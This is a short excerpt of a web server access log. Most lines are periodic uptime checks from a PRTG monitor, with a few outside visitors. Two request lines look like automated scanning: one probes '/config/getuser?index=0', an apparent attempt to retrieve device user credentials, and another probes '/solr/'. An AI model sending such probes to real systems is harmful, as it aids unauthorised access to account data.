212.91.246.72 - - [01/Mar/2022:08:35:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:36:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:37:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.192.241.99 - - [01/Mar/2022:08:37:46 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [01/Mar/2022:08:38:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:39:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:40:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.168.173.151 - - [01/Mar/2022:08:40:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:08:41:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:42:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:43:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:44:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:45:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Mar/2022:08:46:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.118.53.202 - - [01/Mar/2022:08:46:34 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:08:47:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
15.204.130.187 - - [01/Mar/2022:08:47:54 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.83:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
36.80.140.97 - - [01/Mar/2022:08:48:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Mar/2022:08:48:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
